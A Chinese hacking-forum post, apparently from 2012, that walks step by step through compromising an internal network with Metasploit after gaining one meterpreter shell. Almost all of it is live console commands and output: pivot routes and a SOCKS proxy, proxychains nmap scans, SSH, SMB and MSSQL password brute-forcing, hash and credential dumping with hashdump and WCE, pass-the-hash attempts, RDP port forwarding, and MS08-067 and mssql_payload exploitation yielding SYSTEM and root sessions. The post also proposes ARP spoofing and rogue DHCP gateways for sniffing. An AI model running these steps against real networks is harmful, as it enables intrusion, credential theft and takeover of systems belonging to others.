切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
353 Metasploit 跨路由器访问[复制链接]
发表于 2012-11-12 22:56:18 | 显示全部楼层 |!read_mode!
注意 不稳定!
局域网(Local Area Network,LAN)是在一个局部的地理范围内(如一个学校、工厂和机关内),一般是方圆几千米以内,将各种计算机,外部设备和数据库等互相联接起来组成的计算机通信网。它可以通过数据通信网或专用数据电路,与远方的局域网、数据库或处理中心相连接,构成一个较大范围的信息处理系统。局域网可以实现文件管理、应用软件共享、打印机共享、扫描仪共享、工作组内的日程安排、电子邮件和传真通信服务等功能。局域网严格意义上是封闭型的,可以由办公室内的多至上千台计算机组成。首先得获得一个内网的SHELL 转移到SYSTEM权限
入侵局域网有难度,但是拿到一台内网机子就菊花列了 示意图如下




内网入侵的思路
方法1.弱口令
用到的工具 ntscan ,recton,木马
可惜扫了一下一个弱口令都没有!再用superscan 扫了一下port ,发现7台电脑在线,只有三台没开防火墙,而且只开了137 netbios ,123 ntp等端口 只好放弃此方法
方法2. arp欺骗
用到的工具 arpSniffer
在host os (主系统)运行arpsniffer 却遇上提示driver有问题,晕菜,打开一台guest os (虚拟机) 2k3系统运行arpSniffer没问题,顺便嗅探一下自已,上网页的密码,竟然嗅探不到! FT,我也不知道是什么原因,以前在韩国的肉鸡上嗅探FTP密码是没问题的..也罢,此方法也放弃
方法3. 溢出
但考虑到大多电脑都不是开了防火墙,就是打了补丁,此方法也就罢了!
以下两种方法可能网上文章鲜少提过,我自已后来想出来的,但其实需要具备一个条件就是要有局域网的路由器管理权限
方法4. 利用 dhcp 分发地址更改网关到自已机子并嗅探
首先dhcp 分发的元素中有 ip地址,网关,子网掩码,DNS服务器,还有就是分发元素的有效时间(时间这个很重要)
我们要做的就是把dhcp的租期改成10分钟或更短,并把dhcp原来的网关ip地址(路由器lan口的地址)改成我主机的地址.以让所以客户端的数据流从我的主机上走,以达到嗅探(就像一条河有一个砸门,所有鱼要出去必须经过那个砸门)
示意图如下



  1. msf  exploit(handler) > exploit

  2. [*] Started reverse handler on 192.168.1.103:4444
  3. [*] Starting the payload handler...
  4. [*] Sending stage (752128 bytes) to 192.168.1.100
  5. [*] Meterpreter session 1 opened (192.168.1.103:4444 -> 192.168.1.100:51898) at 2012-11-04 20:49:37 +0800

  6. meterpreter > getuid
  7. Server username: BRK-FC17123537C\Administrator
  8. meterpreter > getsystem
  9. ...got system (via technique 1).
  10. meterpreter > getuid
  11. Server username: NT AUTHORITY\SYSTEM
  12. meterpreter >
复制代码


接着查看网段


  1. meterpreter > ifconfig

  2. Interface  1
  3. ============
  4. Name         : MS TCP Loopback interface
  5. Hardware MAC : 00:00:00:00:00:00
  6. MTU          : 1520
  7. IPv4 Address : 127.0.0.1
  8. IPv4 Netmask : 255.0.0.0

  9. Interface  2
  10. ============
  11. Name         : AMD PCNET Family PCI Ethernet Adapter -
  12. Hardware MAC : 00:50:56:28:2c:de
  13. MTU          : 1500
  14. IPv4 Address : 5.5.5.9
  15. IPv4 Netmask : 255.255.255.0

  16. Interface  2
  17. ============
  18. Name         : AMD PCNET Family PCI Ethernet Adapter - pencSR
  19.                                                                 z_WzS
  20. Hardware MAC : 00:50:56:28:2c:de
  21. MTU          : 1500
  22. IPv4 Address : 5.5.5.9
  23. IPv4 Netmask : 255.255.255.0

  24. meterpreter >
复制代码


5.5.5.9 ping测试一下
  1. meterpreter > background
  2. [*] Backgrounding session 1...
  3. msf  exploit(handler) > ping 5.5.5.9
  4. [*] exec: ping 5.5.5.9

  5. ^CInterrupt: use the 'exit' command to quit
  6. msf  exploit(handler) >
复制代码


无反应 接着看下网络信息


  1. msf  exploit(handler) > sessions -i 1
  2. [*] Starting interaction with 1...

  3. meterpreter > route

  4. IPv4 network routes
  5. ===================

  6.     Subnet           Netmask          Gateway    Metric  Interface
  7.     ------           -------          -------    ------  ---------
  8.     0.0.0.0          0.0.0.0          5.5.5.2    10      2
  9.     5.5.5.0          255.255.255.0    5.5.5.9    10      2
  10.     5.5.5.9          255.255.255.255  127.0.0.1  10      1
  11.     5.255.255.255    255.255.255.255  5.5.5.9    10      2
  12.     127.0.0.0        255.0.0.0        127.0.0.1  1       1
  13.     224.0.0.0        240.0.0.0        5.5.5.9    10      2
  14.     255.255.255.255  255.255.255.255  5.5.5.9    1       2

  15. No IPv6 routes were found.
  16. meterpreter >
复制代码


查找网络接口:



  1. Local subnet: 5.5.5.0/255.255.255.0
复制代码


只有一个 route 试试
  1. meterpreter > background
  2. [*] Backgrounding session 1...
  3. msf  exploit(handler) > route add 5.5.5.0 255.255.255.0 1
  4. [*] Route added
  5. msf  exploit(handler) > route print

  6. Active Routing Table
  7. ====================

  8.    Subnet             Netmask            Gateway
  9.    ------             -------            -------
  10.    5.5.5.0            255.255.255.0      Session 1

  11. msf  exploit(handler) >
复制代码


注意 msf exploit(handler) > route add 5.5.5.0 255.255.255.0 1 的 最后一个 1 是sessions的会话ID route 的时候别弄错
来测试扫描一下
  1. msf  exploit(handler) > use auxiliary/scanner/portscan/tcp
  2. msf  auxiliary(tcp) > show options

  3. Module options (auxiliary/scanner/portscan/tcp):

  4.    Name         Current Setting  Required  Description
  5.    ----         ---------------  --------  -----------
  6.    CONCURRENCY  10               yes       The number of concurrent ports to check per host
  7.    PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
  8.    RHOSTS                        yes       The target address range or CIDR identifier
  9.    THREADS      1                yes       The number of concurrent threads
  10.    TIMEOUT      1000             yes       The socket connect timeout in milliseconds

  11. msf  auxiliary(tcp) > set RHOSTS 5.5.5.0-254
  12. RHOSTS => 5.5.5.0-254
  13. msf  auxiliary(tcp) > set PORTS 22,445,135,443,80,1433
  14. PORTS => 22,445,135,443,80,1433
  15. msf  auxiliary(tcp) > exploit

  16. [*] 5.5.5.1:445 - TCP OPEN
  17. [*] 5.5.5.1:135 - TCP OPEN
  18. [*] 5.5.5.1:443 - TCP OPEN
  19. [*] 5.5.5.3:22 - TCP OPEN
  20. [*] 5.5.5.3:80 - TCP OPEN
  21. [*] 5.5.5.4:22 - TCP OPEN
  22. [*] 5.5.5.5:22 - TCP OPEN
  23. [*] 5.5.5.6:80 - TCP OPEN
  24. [*] 5.5.5.6:135 - TCP OPEN
  25. [*] 5.5.5.6:1433 - TCP OPEN
  26. [*] 5.5.5.6:445 - TCP OPEN
  27. -----省略------
复制代码


查看结果:

  1. msf  auxiliary(tcp) > hosts

  2. Hosts
  3. =====

  4. address        mac  name             os_name            os_flavor  os_sp  purpose   info  comments
  5. -------        ---  ----             -------            ---------  -----  -------   ----  --------
  6. 5.5.5.1                              Unknown                              device         
  7. 5.5.5.3                              Unknown                              device         
  8. 5.5.5.4                              Unknown                              device         
  9. 5.5.5.5                              Unknown                              device         
  10. 5.5.5.6                              Unknown                              device         
  11. 5.5.5.8                              Unknown                              device         
  12. 5.5.5.9             BRK-FC17123537C  Microsoft Windows  XP         SP2    client         
  13. 5.5.5.10                             Unknown                              device         
  14. 5.5.5.11                             Unknown                              device         
  15. 192.168.1.100                                                             firewall        

  16. msf  auxiliary(tcp) >
复制代码


查看服务

  1. msf  auxiliary(tcp) > services

  2. Services
  3. ========

  4. host      port  proto  name  state  info
  5. ----      ----  -----  ----  -----  ----
  6. 5.5.5.1   135   tcp          open   
  7. 5.5.5.1   443   tcp          open   
  8. 5.5.5.1   445   tcp          open   
  9. 5.5.5.3   80    tcp          open   
  10. 5.5.5.3   22    tcp          open   
  11. 5.5.5.4   22    tcp          open   
  12. 5.5.5.5   22    tcp          open   
  13. 5.5.5.6   80    tcp          open   
  14. 5.5.5.6   135   tcp          open   
  15. 5.5.5.6   445   tcp          open   
  16. 5.5.5.6   1433  tcp          open   
  17. 5.5.5.8   443   tcp          open   
  18. 5.5.5.8   80    tcp          open   
  19. 5.5.5.8   22    tcp          open   
  20. 5.5.5.9   80    tcp          open   
  21. 5.5.5.9   135   tcp          open   
  22. 5.5.5.9   443   tcp          open   
  23. 5.5.5.9   445   tcp          open   
  24. 5.5.5.10  445   tcp          open   
  25. 5.5.5.10  135   tcp          open   
  26. 5.5.5.10  443   tcp          open   
  27. 5.5.5.10  80    tcp          open   
  28. 5.5.5.11  22    tcp          open   

  29. msf  auxiliary(tcp) >
复制代码


我们可以根据服务做一些事情 开SSH的比较多 MSF的扫描速度很扯淡 可以开个代理给NMAP扫描 如:

  1. msf > use auxiliary/server/socks4a
  2. msf  auxiliary(socks4a) > show options

  3. Module options (auxiliary/server/socks4a):

  4.    Name     Current Setting  Required  Description
  5.    ----     ---------------  --------  -----------
  6.    SRVHOST  0.0.0.0          yes       The address to listen on
  7.    SRVPORT  1080             yes       The port to listen on.

  8. msf  auxiliary(socks4a) > exit
  9. [*] You have active sessions open, to exit anyway type "exit -y"

  10. [*] Starting the socks4a proxy server
  11. msf  auxiliary(socks4a) >
复制代码


接着就需要神器proxychains 来帮助我们使用代理接口 编辑proxychains 配置文件

  1. brk@Dis9Team:/tmp$ sudo nano /etc/proxychains.conf
复制代码


修改默认代理如下:

  1. socks4  127.0.0.1 1080
复制代码


测试

  1. msf  auxiliary(socks4a) > sessions

  2. Active sessions
  3. ===============

  4.   Id  Type                   Information                                      Connection
  5.   --  ----                   -----------                                      ----------
  6.   1   meterpreter x86/win32  BRK-FC17123537C\Administrator @ BRK-FC17123537C  192.168.1.103:4444 -> 192.168.1.100:51898 (5.5.5.9)

  7. msf  auxiliary(socks4a) >
复制代码


IP 5.5.5.9 链接他的445端口
  1. brk@Dis9Team:/tmp$ proxychains nc -vv 5.5.5.9 445
  2. ProxyChains-3.1 (http://proxychains.sf.net)
  3. |S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.9:445-<><>-OK
  4. Connection to 5.5.5.9 445 port [tcp/microsoft-ds] succeeded!
复制代码


成功 开始用NMAP探测
  1. brk@Dis9Team:/tmp$ proxychains nmap -sP 5.5.5.0/24
  2. ProxyChains-3.1 (http://proxychains.sf.net)

  3. Starting Nmap 6.00 ( http://nmap.org ) at 2012-11-04 21:27 CST
  4. |S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.1:80-<--denied
  5. |S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.4:80-<--denied
  6. |S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.7:80-<--timeout
  7. |S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.10:80-<><>-OK
  8. |S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.11:80-<--denied
复制代码


扫描一个主机
  1. brk@Dis9Team:/tmp$ sudo proxychains nmap 5.5.5.5 -sV -sT -T5 -O -PN
  2. |S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.5:256-<--timeout
  3. |S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.5:110-<--timeout
  4. |S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.5:3306-<--timeout
  5. |S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.5:8080-<--timeout
  6. |S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.5:445-<--timeout
  7. |S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.5:22-<><>-OK
  8. |S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.5:22-<><>-OK
  9. Nmap scan report for 5.5.5.5
  10. Host is up (0.10s latency).
  11. PORT   STATE SERVICE VERSION
  12. 22/tcp open  ssh     OpenSSH 4.3 (protocol 2.0)
  13. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  14. OS fingerprint not ideal because: Timing level 5 (Insane) used
  15. No OS matches for host

  16. OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
  17. Nmap done: 1 IP address (1 host up) scanned in 8.06 seconds
  18. brk@Dis9Team:/tmp$
复制代码


开放了SSH 用MSF破解试试

  1. msf  auxiliary(ssh_login) > exploit

  2. [*] 5.5.5.5:22 SSH - Starting bruteforce
  3. [*] 5.5.5.5:22 SSH - [1/4] - Trying: username: 'root' with password: ''
  4. [-] 5.5.5.5:22 SSH - [1/4] - Failed: 'root':''
  5. [*] 5.5.5.5:22 SSH - [2/4] - Trying: username: 'root' with password: 'root'
  6. [-] 5.5.5.5:22 SSH - [2/4] - Failed: 'root':'root'
  7. [*] 5.5.5.5:22 SSH - [3/4] - Trying: username: 'root' with password: '123456'
  8. -----不给你看--------------
  9. [*] Command shell session 2 opened (192.168.1.103-192.168.1.100:0 -> 5.5.5.5:22) at 2012-11-04 21:32:58 +0800
  10. [+] 5.5.5.5:22 SSH - [3/4] - Success: 'root':'不给你看' 'uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=root:system_r:unconfined_t:SystemLow-SystemHigh Linux CENTOS 2.6.18-194.el5 #1 SMP Fri Apr 2 14:58:35 EDT 2010 i686 i686 i386 GNU/Linux '
  11. [*] Scanned 1 of 1 hosts (100% complete)
  12. [*] Auxiliary module execution completed
  13. msf  auxiliary(ssh_login) >
复制代码


成功破解出了SSH密码



链接试试

  1. msf  auxiliary(ssh_login) > sessions

  2. Active sessions
  3. ===============

  4.   Id  Type                   Information                                      Connection
  5.   --  ----                   -----------                                      ----------
  6.   1   meterpreter x86/win32  BRK-FC17123537C\Administrator @ BRK-FC17123537C  192.168.1.103:4444 -> 192.168.1.100:51898 (5.5.5.9)
  7.   2   shell linux            SSH root:不给你看 (5.5.5.5:22)                     192.168.1.103-192.168.1.100:0 -> 5.5.5.5:22 (5.5.5.5)

  8. msf  auxiliary(ssh_login) > sessions -i 2
  9. [*] Starting interaction with 2...

  10. id
  11. uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=root:system_r:unconfined_t:SystemLow-SystemHigh
  12. cat /proc/version
  13. Linux version 2.6.18-194.el5 (mockbuild@builder16.centos.org) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-48)) #1 SMP Fri Apr 2 14:58:35 EDT 2010
  14. lsb_release -a
  15. LSB Version:        :core-3.1-ia32:core-3.1-noarch:graphics-3.1-ia32:graphics-3.1-noarch
  16. Distributor ID:        CentOS
  17. Description:        CentOS release 5.5 (Final)
  18. Release:        5.5
  19. Codename:        Final
复制代码



貌似开SSH的很多 批量扫描吧



  1. msf  auxiliary(ssh_login) > sessions

  2. Active sessions
  3. ===============

  4.   Id  Type                   Information                                      Connection
  5.   --  ----                   -----------                                      ----------
  6.   1   meterpreter x86/win32  BRK-FC17123537C\Administrator @ BRK-FC17123537C  192.168.1.103:4444 -> 192.168.1.100:51898 (5.5.5.9)
  7.   3   shell linux            SSH root:123456 (5.5.5.3:22)                     192.168.1.103-192.168.1.100:0 -> 5.5.5.3:22 (5.5.5.3)
  8.   4   shell linux            SSH root:a (5.5.5.8:22)                          192.168.1.103-192.168.1.100:0 -> 5.5.5.8:22 (5.5.5.8)
  9.   5   shell linux            SSH root:123456 (5.5.5.5:22)                     192.168.1.103-192.168.1.100:0 -> 5.5.5.5:22 (5.5.5.5)
  10.   6   shell linux            SSH root:123456 (5.5.5.4:22)                     192.168.1.103-192.168.1.100:0 -> 5.5.5.4:22 (5.5.5.4)
  11.   7   shell linux            SSH root:123456 (5.5.5.11:22)                    192.168.1.103-192.168.1.100:0 -> 5.5.5.11:22 (5.5.5.11)

  12. msf  auxiliary(ssh_login) >
复制代码



还有几台WINDOWS的呢?

  1. msf  auxiliary(ssh_login) > services -p 445

  2. Services
  3. ========

  4. host      port  proto  name  state  info
  5. ----      ----  -----  ----  -----  ----
  6. 5.5.5.1   445   tcp          open   
  7. 5.5.5.6   445   tcp          open   
  8. 5.5.5.9   445   tcp          open   
  9. 5.5.5.10  445   tcp          open   

  10. msf  auxiliary(ssh_login) >
复制代码
测试SMB探测

  1. msf  auxiliary(smb_enumshares) > set RHOSTS 5.5.5.1
  2. RHOSTS => 5.5.5.1
  3. msf  auxiliary(smb_enumshares) > run

  4. [*] 5.5.5.1:445 ADMIN$ -
  5.                          z{t (DISK), C$ - qQN (DISK), D$ - qQN (DISK), E$ - qQN (DISK), F$ - qQN (DISK), ftp -  (DISK), H$ - qQN (DISK), IPC$ -
  6.                        z IPC (IPC)
  7. [*] Scanned 1 of 1 hosts (100% complete)
  8. [*] Auxiliary module execution completed
  9. msf  auxiliary(smb_enumshares) >
复制代码


貌似有东西
查看一下:



不晓得有木有九区狗的名单,有就全部封杀了 恩访问下

  1. brk@Dis9Team:/tmp/123$ proxychains smbclient //5.5.5.1/ftp
  2. ProxyChains-3.1 (http://proxychains.sf.net)
  3. Enter brk's password:
  4. |S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.1:445-<><>-OK
  5. Domain=[DIS91] OS=[Windows 7 Ultimate 7601 Service Pack 1] Server=[Windows 7 Ultimate 6.1]
  6. smb: \> dir
  7.   .                                   D        0  Sun Nov  4 20:11:13 2012
  8.   ..                                  D        0  Sun Nov  4 20:11:13 2012
  9.   1                                   D        0  Mon Oct 29 03:12:49 2012
  10.   1.rar                               A 5554064923  Sat Oct 27 16:35:12 2012
  11.   1.zip                               A 2165820895  Sun Oct  7 10:09:40 2012
  12.   2.iso                               A 728018944  Tue Oct  9 19:58:06 2012
  13.   2.zip                               A 1220728381  Sun Oct 14 00:41:59 2012
  14.   AspSweb.exe                         A   649745  Fri Aug 15 16:45:34 2008
  15.   burpsuite.jar                       A  8198291  Thu Sep 27 03:29:29 2012
  16.   CS1_5_chsV1.0.zip                   A 283779223  Sat Sep 29 15:19:44 2012
  17.   down                                D        0  Sun Sep 23 20:19:12 2012
  18.   ftp.zip                             A 11599105  Sun Sep 30 09:54:53 2012
  19.   HdReport.txt                        A     2479  Thu Sep 27 10:20:01 2012
  20.   kubuntu-12.04.1-desktop-amd64.iso      A 736407552  Sun Sep 16 22:07:52 2012
  21.   My Games.zip                        A  3595119  Wed Oct 10 18:49:53 2012
  22.   TorchlightII_chsV1.11.5.3.zip       A 1609147375  Wed Oct 10 18:48:25 2012
  23.   Ubuntu1.zip                         A 2833754852  Wed Oct 10 11:28:54 2012
  24.   users.dat                           A       74  Sun Oct 14 00:47:32 2012
  25.   VRMPVOL_CNsp2.iso                   A 621346816  Sat Sep 29 10:20:44 2012
  26.   yxdown.com_TorchlightII_chsV1.11.5.3.exe      A 1590876064  Wed Sep 26 05:09:13 2012
  27.   浮生偷换.mp3                    A  6303705  Sat Sep 15 21:21:19 2012
  28.   金粉沉埋.mp3                    A  5532570  Sat Sep 15 22:49:35 2012

  29.                 36381 blocks of size 4194304. 14743 blocks available
  30. smb: \>
复制代码



有水一的歌曲哦
先获得帐号密码

  1. meterpreter > hashdump
  2. Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
  3. Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  4. HelpAssistant:1000:54688ec262626f406dadd35533ff3375:19d7141e4c62b1f5318db46b6d0f1390:::
  5. SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:30f6b88b04ce59ef6e72ad5f4df330ee:::
  6. meterpreter >
复制代码


可以进行PASS THE HASH攻击

  1. msf  exploit(psexec) > exploit

  2. [*] Started reverse handler on 192.168.1.103:4444
  3. [*] Connecting to the server...
  4. [*] Authenticating to 5.5.5.9:445|WORKGROUP as user ''...
  5. [-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)
  6. ^Cmsf  exploit(psexec) > set RHOST 5.5.5.6
  7. RHOST => 5.5.5.6
  8. msf  exploit(psexec) > exploit

  9. [*] Started reverse handler on 192.168.1.103:4444
  10. [*] Connecting to the server...
  11. [*] Authenticating to 5.5.5.6:445|WORKGROUP as user ''...
  12. [-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)
  13. ^Cmsf  exploit(psexec) >
复制代码


失败了 破解密码

  1. meterpreter > upload wce.exe c:\\wce.exe
  2. [*] uploading  : wce.exe -> c:\wce.exe
  3. [*] uploaded   : wce.exe -> c:\wce.exe
  4. meterpreter > shell
  5. Process 4060 created.
  6. Channel 4 created.
  7. Microsoft Windows XP [汾 5.1.2600]
  8. (C)  1985-2001 Microsoft Corp.

  9. C:\WINDOWS\system32>cd \
  10. cd \

  11. C:\>wce -w
  12. wce -w
  13. WCE v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
  14. Use -h for help.


  15. Administrator\BRK-FC17123537C:123456
  16. NETWORK SERVICE\WORKGROUP:123456

  17. C:\>
复制代码


端口转发链接

  1. meterpreter > portfwd add -l 3389 -p 3389 -r 127.0.0.1
  2. [*] Local TCP relay created: 0.0.0.0:3389 <-> 127.0.0.1:3389
  3. meterpreter > portfwd list
  4. 0: 0.0.0.0:3389 -> 127.0.0.1:3389

  5. 1 total local port forwards.
  6. meterpreter >
复制代码


探测一下

  1. brk@Dis9Team:~$ sudo nmap 127.0.0.1 -p 3389

  2. Starting Nmap 6.00 ( http://nmap.org ) at 2012-11-04 23:35 CST
  3. Nmap scan report for localhost (127.0.0.1)
  4. Host is up (0.000054s latency).
  5. PORT     STATE SERVICE
  6. 3389/tcp open  ms-wbt-server

  7. Nmap done: 1 IP address (1 host up) scanned in 0.05 seconds
  8. brk@Dis9Team:~$
复制代码


直接连接

  1. brk@Dis9Team:~$ rdesktop -u administrator -p 123456 127.0.0.1
复制代码


尝试连接其他的

  1. msf  auxiliary(ssh_login) > services -p 445

  2. Services
  3. ========

  4. host           port  proto  name  state  info
  5. ----           ----  -----  ----  -----  ----
  6. 5.5.5.1        445   tcp          open   
  7. 5.5.5.6        445   tcp          open   
  8. 5.5.5.9        445   tcp          open   
  9. 5.5.5.10       445   tcp          open   
  10. 192.168.1.100  445   tcp    smb   open   

  11. msf  auxiliary(ssh_login) > use auxiliary/scanner/smb/smb_login
  12. msf  auxiliary(smb_login) > show options

  13. Module options (auxiliary/scanner/smb/smb_login):

  14.    Name              Current Setting  Required  Description
  15.    ----              ---------------  --------  -----------
  16.    BLANK_PASSWORDS   true             no        Try blank passwords for all users
  17.    BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
  18.    PASS_FILE                          no        File containing passwords, one per line
  19.    PRESERVE_DOMAINS  true             no        Respect a username that contains a domain name.
  20.    RECORD_GUEST      false            no        Record guest-privileged random logins to the database
  21.    RHOSTS                             yes       The target address range or CIDR identifier
  22.    RPORT             445              yes       Set the SMB service port
  23.    SMBDomain         WORKGROUP        no        SMB Domain
  24.    SMBPass                            no        SMB Password
  25.    SMBUser                            no        SMB Username
  26.    STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
  27.    THREADS           1                yes       The number of concurrent threads
  28.    USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
  29.    USER_AS_PASS      true             no        Try the username as the password for all users
  30.    USER_FILE                          no        File containing usernames, one per line
  31.    VERBOSE           true             yes       Whether to print output for all attempts

  32. msf  auxiliary(smb_login) > set RHOSTS 5.5.5.1
  33. RHOSTS => 5.5.5.1
  34. msf  auxiliary(smb_login) > exploit

  35. [*] 5.5.5.1:445 SMB - Starting SMB login bruteforce
  36. ----跳过---
  37. [*] Auth-User: "administrator"
  38. [+] 5.5.5.1:445|WORKGROUP - SUCCESSFUL LOGIN (Windows 7 Ultimate 7601 Service Pack 1) 'administrator' : '123456'
  39. [*] Scanned 1 of 1 hosts (100% complete)
  40. [*] Auxiliary module execution completed
  41. msf  auxiliary(smb_login) >
复制代码





如果扫到数据库密码也是能进行利用的

  1. msf  auxiliary(mssql_login) > exploit

  2. [*] 5.5.5.6:1433 - MSSQL - Starting authentication scanner.
  3. [*] 5.5.5.6:1433 MSSQL - [1/3] - Trying username:'sa' with password:''
  4. [-] 5.5.5.6:1433 MSSQL - [1/3] - failed to login as 'sa'
  5. [*] 5.5.5.6:1433 MSSQL - [2/3] - Trying username:'sa' with password:'sa'
  6. [-] 5.5.5.6:1433 MSSQL - [2/3] - failed to login as 'sa'
  7. [*] 5.5.5.6:1433 MSSQL - [3/3] - Trying username:'sa' with password:'123456'
  8. [+] 5.5.5.6:1433 - MSSQL - successful login 'sa' : '123456'
  9. [*] Scanned 1 of 1 hosts (100% complete)
  10. [*] Auxiliary module execution completed
  11. msf  auxiliary(mssql_login) >
复制代码



利用

  1. msf  auxiliary(mssql_login) > use exploit/windows/mssql/mssql_payload
  2. msf  exploit(mssql_payload) > set RHOST 5.5.5.6
  3. RHOST => 5.5.5.6
  4. msf  exploit(mssql_payload) > set PASSWORD 123456
  5. PASSWORD => 123456
  6. msf  exploit(mssql_payload) > show options

  7. Module options (exploit/windows/mssql/mssql_payload):

  8.    Name                 Current Setting  Required  Description
  9.    ----                 ---------------  --------  -----------
  10.    METHOD               cmd              yes       Which payload delivery method to use (ps, cmd, or old)
  11.    PASSWORD             123456           no        The password for the specified username
  12.    RHOST                5.5.5.6          yes       The target address
  13.    RPORT                1433             yes       The target port
  14.    USERNAME             sa               no        The username to authenticate as
  15.    USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)


  16. Exploit target:

  17.    Id  Name
  18.    --  ----
  19.    0   Automatic


  20. msf  exploit(mssql_payload) > set METHOD old
  21. METHOD => old
  22. msf  exploit(mssql_payload) > exploit
复制代码





对于溢出呢? 也是一样的

  1. msf  exploit(mssql_payload) > use exploit/windows/smb/ms08_067_netapi
  2. msf  exploit(ms08_067_netapi) > set RHOST 5.5.5.10
  3. RHOST => 5.5.5.10
  4. msf  exploit(ms08_067_netapi) > set TARGET 17
  5. TARGET => 17
  6. msf  exploit(ms08_067_netapi) > exploit

  7. [*] Started reverse handler on 192.168.1.103:4444
  8. [*] Attempting to trigger the vulnerability...
  9. [*] Sending stage (752128 bytes) to 192.168.1.100
  10. [*] Meterpreter session 13 opened (192.168.1.103:4444 -> 192.168.1.100:55645) at 2012-11-04 23:52:35 +0800

  11. meterpreter > background
  12. [*] Backgrounding session 14...
  13. smsf  exploit(ms08_067_netapi) > sessions

  14. Active sessions
  15. ===============

  16.   Id  Type                   Information                                      Connection
  17.   --  ----                   -----------                                      ----------
  18.   2   shell linux            SSH root:123456 (5.5.5.5:22)                     192.168.1.103-192.168.1.100:0 -> 5.5.5.5:22 (5.5.5.5)
  19.   3   shell linux            SSH root:a (5.5.5.8:22)                          192.168.1.103-192.168.1.100:0 -> 5.5.5.8:22 (5.5.5.8)
  20.   4   shell linux            SSH root:123456 (5.5.5.3:22)                     192.168.1.103-192.168.1.100:0 -> 5.5.5.3:22 (5.5.5.3)
  21.   5   shell linux            SSH brk:123456 (5.5.5.5:22)                      192.168.1.103-192.168.1.100:0 -> 5.5.5.5:22 (5.5.5.5)
  22.   6   shell linux            SSH brk:123456 (5.5.5.3:22)                      192.168.1.103-192.168.1.100:0 -> 5.5.5.3:22 (5.5.5.3)
  23.   7   shell linux            SSH root:123456 (5.5.5.4:22)                     192.168.1.103-192.168.1.100:0 -> 5.5.5.4:22 (5.5.5.4)
  24.   8   shell linux            SSH root:123456 (5.5.5.11:22)                    192.168.1.103-192.168.1.100:0 -> 5.5.5.11:22 (5.5.5.11)
  25.   9   shell linux            SSH brk:a (5.5.5.4:22)                           192.168.1.103-192.168.1.100:0 -> 5.5.5.4:22 (5.5.5.4)
  26.   10  shell linux            SSH brk:a (5.5.5.11:22)                          192.168.1.103-192.168.1.100:0 -> 5.5.5.11:22 (5.5.5.11)
  27.   11  meterpreter x86/win32  BRK-FC17123537C\Administrator @ BRK-FC17123537C  192.168.1.103:4444 -> 192.168.1.100:55335 (5.5.5.9)
  28.   12  meterpreter x86/win32  NT AUTHORITY\SYSTEM @ FUZZEXP-F60914C            192.168.1.103:4444 -> 192.168.1.100:55511 (5.5.5.6)
  29.   14  meterpreter x86/win32  NT AUTHORITY\SYSTEM @ BRK-FC17123537C            192.168.1.103:123 -> 192.168.1.100:55960 (5.5.5.10)

  30. msf  exploit(ms08_067_netapi) >
复制代码





附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-31 00:11

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部